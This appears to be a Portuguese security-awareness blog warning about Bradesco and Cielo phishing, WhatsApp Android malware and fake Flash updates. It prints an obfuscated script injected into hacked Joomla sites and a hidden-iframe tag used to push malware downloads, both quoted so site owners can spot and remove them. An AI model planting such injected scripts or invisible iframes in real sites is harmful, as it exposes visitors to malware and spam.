E-mail de phishing contra o Bradesco

Recebi um e-mail de um phishing contra o banco Bradesco.
O e-mail começa dizendo que tem um divergência de cadastro e logo no final pede para acesssar o link.
Sabendo os bancos não fazem esse tipo de abordagem.
Ao passar o mouse em cima do link, verifiquei que não fazia parte do domínio do banco.

Usando um comando wget no linux consegui baixar a página e ao mesmo tempo foi redirecionando para baixar um arquivo de extensão .msi.

Um programa para Windows contendo malware.

wget http://www.abcdsds.acb/dxxsdgffd/fdfssdq/reset.php

--2013-11-14 08:51:37--  http://www.abcdsds.acb/dxxsdgffd/fdfssdq/reset.php

Resolvendo www.korledare.se (www.abcdsds.acb)... 195.74.38.131

Conectando-se a www.korledare.se (www.abcdsds.acb)|195.74.38.131|:80... conectado.

A requisição HTTP foi enviada, aguardando resposta... 302 Moved Temporarily

Localização: http://xxxsaaaasasa.com/media/system/-/?2YJR7AA08UY6OOJ8DMPWMTW

JY23CXU2ZTKRZV293W79KVRS9DH6ZB3JA4MM2GO100S05TH8QOFAJ74SKKXKWZ474PT#selected

folder=INBOXmain?notice=true [redirecionando]

--2013-11-14 08:51:37--  http://xxxsaaaasasa.com/media/system/-/?2YJR7AA08UY6

OOJ8DMPWMTWJY23CXU2ZTKRZV293W79KVRS9DH6ZB3JA4MM2GO100S05TH8QOFAJ74SKKXKWZ474PT

Resolvendo xxxsaaaasasa.com (xxxsaaaasasa.com)... 97.74.215.52

Conectando-se a xxxsaaaasasa.com (xxxsaaaasasa.com)|97.74.215.52|:80... conectado.

A requisição HTTP foi enviada, aguardando resposta... 200 OK

Tamanho: não especificada [text/html]

Salvando em: “reset.php”

    [  <=>                                  ] 9.656       43,7KB/s   em 0,2s   

2013-11-14 08:51:38 (43,7 KB/s) - “reset.php” salvo [9656]

Phishing contra clientes Cielo

Antes de alertar sobre o golpe contra os clientes que usam o serviço da Cielo, gostaria de informar que esse post é para difundir sobre a prática de phishing e ensinar a se proteger.

Não foi informado nome do site assim como o seu proprietário.
Fiz todo o teste com dados inválidos para constatar que se tratava de um incidente de segurança.

A página inicial para enganar os clientes. 

Escolhi o banco e informei agência e conta totalmente errada.

O fraudador pedindo informações importante do cartão.

A senha eletrônica.

Essa parte que foi mais absurda. O pedido de todos os números do token para que o fraudador se passe pelo cliente.

Quando ele pega todos os dados importantes, diz que houve um erro no servidor. Quando já obteve todos os dados necessário para a plicação do golpe

Depois de alguns segundos ele retorna para o site verdadeiro do banco. Infelizmente já é tarde.

Demostrei passo a passo uma fraude que peguei quando estava acessando a internet.
Se não tivesse conhecimento estaria com um grande problema para resolver.
Quando isso acontece só percebemos quando a própria operadora de cartão entra em contato ou quando vemos o extrato com compras que não efetuamos.

Como remover a função dnnViewState() no Joomla

Com a popularização dos CMS como o Joomla a boa administração e atualização é essencial.
Há vários scripts que usam as brechas encontradas nas versões antigas e com isso deixando o site aberto para incidentes.
Se esse for o seu caso não deixe de atualiza-lo.
Trata-se de uma técnica de blackhat (técnica de SEO para burla os buscadores) que são notificados pelos antivírus e pelo próprio Google.
O atacante usa a brecha encontrada no Joomla para inserir o código e assim obtendo mais acesso para o seu site, aumentando o seu pagerank.

Abaixo mostro um código que geralmente é encontrado em www/modules/mod_AutsonSlideShow/tmpl/default.php

<script language="JavaScript">

function dnnViewState()

{

var a=0,m,v,t,z,x=new Array('9091968376','8887...','778787','9499...'),
l=x.length;while(++a<=l){m=x[l-a];
t=z='';

for(v=0;v<m.length;){t+=m.charAt(v++);

if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);

t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();

</script>

Existe uma variante para o Wordpress onde é trocado o nome da função function dnnViewState() para function xViewState()
Obs: Sempre atualize o seu CMS e cuidado na hora de aplicar as permissões dos arquivos :)

Malware no WhatApp

 

Com o aumento de usuários do serviço de mensagens chamado WhatApp, já parecem as pragas virtuais para enganar os clientes desse serviço.
Tudo não passa da velha tática de clique para ver, escutar ou baixar. Cuidado.
O incidente acontence em smartphones com sistema Android e depois de instalado o malware faz:

• Envio da cópia do malware para os seus contatos.
• Roubo de dados pessoais.
• Senhas armazenadas no dispositivo.

Tenha cuidado com esse tipo de mensagem e verifique o remetente antes de clicar.
Segue uma imagem:

Recomendo sempre o uso de um antivírus no seu smartphone.

Malware pede para atualizar o Flash Player

Ultimamente vejo casos de vírus embutidos no próprio código do site que faz com que o Google Chrome alerte dizendo que não é seguro prosseguir com a sua visitação.

São vírus que usam a tag <iframe> de forma invisível que leva a baixar um arquivo com malware ou para um site de remédios por exemplos. Como: <iframe src="endereço do link com malware" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>

Há casos que ao entrar no site é solicitado para atualizar o seu Flash Player. Cuidado pois isso é vírus. Geralmente usam javascript para o golpe.

Ao clicar no botão de atualizar do suposto flash player o usuário baixar um arquivo zipado contendo outro arquivo com a extensão .cpl. O arquivo cpl faz parte do sistema Windows e é um mini aplicativo para o painel de controle.

Desconfiem de sites que ao entrar pede para atualizar o flash, adobe reader ou 

faz com que baixe arquivos sem a sua solicitação.

Existem alguns sites de anti vírus online que conseguem verificar esse tipo de ameaça como Virus Total, Sucuri, Url Void e entre outros.